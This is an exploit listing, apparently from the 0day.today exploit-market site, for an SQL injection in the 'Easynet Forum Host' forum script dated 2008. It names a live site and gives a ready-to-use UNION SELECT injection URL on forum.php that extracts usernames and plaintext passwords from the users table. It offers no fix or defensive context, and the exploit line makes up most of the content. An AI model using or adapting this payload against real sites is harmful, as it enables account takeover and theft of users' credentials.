[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Easynet Forum Host (forum.php forum) SQL Injection Vulnerability

Author
t0pP8uZz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2819
Category
web applications
Date add
04-04-2008
Platform
unsorted
================================================================
Easynet Forum Host (forum.php forum) SQL Injection Vulnerability
================================================================



--==+================================================================================+==--
--==+		       Easynet Forum Host SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz & xprog
Discovered On: 5 April 2008
SCRIPT DOWNLOAD: N/A


SITE: http://www.easynet4u.com/forum


DORK: N/A

DESCRIPTION: retrive users username and plaintext password.

EXPLOITS:

EXPLOIT 1: http://www.server.com/SCRIPT_PATH/forum.php?forum=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6/**/FROM/**/users/*




#  0day.today [2024-12-25]  #